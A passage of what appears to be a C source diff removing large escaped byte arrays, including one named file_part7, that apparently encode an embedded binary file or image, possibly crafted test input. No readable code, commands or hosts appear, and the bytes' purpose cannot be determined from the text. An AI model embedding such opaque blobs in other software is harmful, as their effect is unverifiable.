-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x12\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x1b" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -; -char file_part7[]= -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x4e\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\x82\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\xef\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" 
-"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x01\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x14\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" 
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" 
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" 
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00" -"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" 
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" 
